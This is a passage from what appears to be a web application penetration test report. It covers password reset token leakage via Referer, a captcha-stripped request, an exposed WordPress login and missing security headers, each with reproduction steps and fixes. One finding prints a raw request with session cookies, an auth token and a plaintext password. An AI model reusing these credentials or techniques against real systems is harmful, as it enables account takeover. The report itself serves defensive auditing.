ect_to=&wp-submit=Get+New+Password
Recommendations ● Implement checking captcha on the server-side.
● Implement rate limit
Reset Token in Referer
#17 Description Type: Real
Password reset token sends to third party. The typical password reset link is emailed to the
user and contains a unique token that in some manner identifies the user. At this point, they are
asked to provide a new password. If an attacker were able to access the password reset link,
the attacker would then be able to authenticate as the user and provide that new password,
thus gaining unfettered access to the user’s account. Attackers frequently accomplish this by
gaining access to the user’s email, though as I recently discovered many applications are
unwittingly passing password reset links to third party sites.
46. Barring an intermediate redirect between the user clicking the link in their email and the
password reset form being rendered, the browser will expose the password reset link in the
Referer sent when requesting the referenced assets or the analytics package. If the user does
not complete the password reset and instead clicks on one of the external links, the password
reset link will be leaked via the Referer on those requests as well. Also reset tokens can be
stored at browser history and at third party provider side which make it possible to use this
tokens by not authorised persons or systems.
Evidences
Steps to reproduce:
1. Request a password reset and click the link that is emailed to you.
2. Copy the URL from the resulting page.
3. Open a private browser window or a different web browser and paste the copied
URL
4. Investigate all third party requests which contain password reset token
47. Recommendations 1. invalidate the password reset token in the request and
generate a new one that is used in the form action. The
Referer will still contain the original password reset
token, but the token is no longer valid.
2. Update the controller action so it detects the presence
of a token in the URL, stores that token in the session,
and redirects back to password edit with the token
removed the URL. The Referer will no longer contain the
necessary token.
48. Informational
Potential DoS Request
#18 Description Type: Real
The request doesn’t receive a response from the server. It is spoiled because of removing
captcha field.
Evidences
Request:
POST /v1/auth/mfa/otp/secret/disable HTTP/1.1
Host: api.stg.noname-client.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/plain, */*
Accept-Language: ru,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://exchange.stg.noname-client.com/acc/security
Content-Type: application/json;charset=utf-8
Content-Length: 407
Origin: https://exchange.stg.noname-client.com
Cookie: _ga=GA1.2.1373314543.1562663119; _gid=GA1.2.444414036.1562663119;
AWSALB=dXNCeo6T20UXeWceOhOcnGjjdnZX5vvCtAdkJbDB8qGtI7sUBMVc/uvgNSJJLzjTJ
YJbmF+v3mCR0mqX218n785QF+TX2ednyGwZ81DEQuF3u02p15pri+jUPo6n;
true=s_Psr-O9Tv-0dc11AAAl; io=yEMbOCYPwWoBTK5UAAAM;
token=113fcda814af195f12ea17ac5801dc6e89ed46288c185a074361fbd4f1c8491e821e49db1
2f97148188bce4a805e7fa5ca2fa8ed69ecbd5fe73e0b3903d9c4160
Connection: close
{"password":"QQqq1111111111!!","code":"417770"}
Recommendations Investigate this request and remove if not used.
49. WP Admin Panel Accessible
#19 Description Type: Real
WP admin panel has access from Internet without any restrictions.
Evidences
Steps to reproduce:
Go to https://www.noname-client.com/wp-login.php
Recommendations WP admin panel has to provide access only from internal
networks or VPN
50. HTTP Without Security Headers
#20 Description Type: Real
Description
There was no "X-Content-Type-Options" HTTP header with the value nosniff set in the
response. The lack of this header causes that certain browsers, try to determine the content
type and encoding of the response even when these properties are defined correctly. This can
make the web application vulnerable against Cross-Site Scripting (XSS) attacks. E.g. the
Internet Explorer and Safari treat responses with the content type text/plain as HTML, if they
contain HTML tags.
No X-XSS-Protection header was set in the response. This means that the browser uses
default behaviour that detection of a cross-site scripting attack never prevents rendering.
The HTTP Strict Transport Security policy defines a timeframe where a browser must connect
to the web server via HTTPS. Without a Strict Transport Security policy the web application
may be vulnerable against several attacks:
● If the web application mixes usage of HTTP and HTTPS, an attacker can manipulate
pages in the unsecured area of the application or change redirection targets in a manner that
the switch to the secured page is not performed or done in a manner, that the attacker remains
between client and server.
● If there is no HTTP server, an attacker in the same network could simulate a HTTP
server and motivate the user to click on a prepared URL by a social engineering attack.
Unless directed otherwise, browsers may store a local cached copy of content received from
web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS.
If sensitive information in application responses is stored in the local cache, then this may be
retrieved by other users who have access to the same computer at a future
time.(Cache-control: no-store, Pragma: no-cache)
The secure flag should be set on all cookies that are used for transmitting sensitive data when
accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of
the application that are accessed over HTTPS should employ their own session handling
mechanism, and the session tokens used should never be transmitted over unencrypted
communications. (NC-SSL-CSRF-TOKEN)